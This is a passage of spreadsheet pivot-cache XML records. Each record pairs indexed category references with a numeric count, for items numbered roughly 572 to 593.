  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="572"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="572"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="572"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="12"/>
    <x v="573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="16"/>
    <x v="573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="60"/>
    <x v="573"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="35"/>
    <x v="573"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="31"/>
    <x v="573"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="574"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="574"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="574"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="2"/>
    <x v="575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="18"/>
    <x v="575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="575"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="576"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="576"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="576"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="577"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="577"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="577"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="577"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="578"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="578"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="578"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="14"/>
    <x v="578"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="54"/>
    <x v="578"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="578"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="12"/>
    <x v="579"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="579"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="579"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="580"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="580"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="580"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="580"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="580"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="580"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="581"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="581"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="581"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="582"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="50"/>
    <x v="582"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="582"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="583"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="11"/>
    <x v="584"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="584"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="584"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="19"/>
    <x v="584"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="35"/>
    <x v="584"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="584"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="585"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="585"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="60"/>
    <x v="585"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="67"/>
    <x v="585"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="41"/>
    <x v="586"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="586"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="586"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="586"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="122"/>
    <x v="586"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="586"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="587"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="587"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="587"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="588"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="589"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="589"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="589"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="589"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="21"/>
    <x v="590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="22"/>
    <x v="590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="31"/>
    <x v="590"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="53"/>
    <x v="590"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="590"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="16"/>
    <x v="590"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="47"/>
    <x v="590"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="151"/>
    <x v="590"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="590"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="590"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="591"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="591"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="591"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="591"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="591"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="592"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="592"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="592"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="592"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="592"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="592"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="592"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="592"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="593"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="593"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="593"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="593"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="13"/>
    <x v="593"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="64"/>
    <x v="593"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="79"/>
    <x v="593"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="593"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="593"/>
  </r>
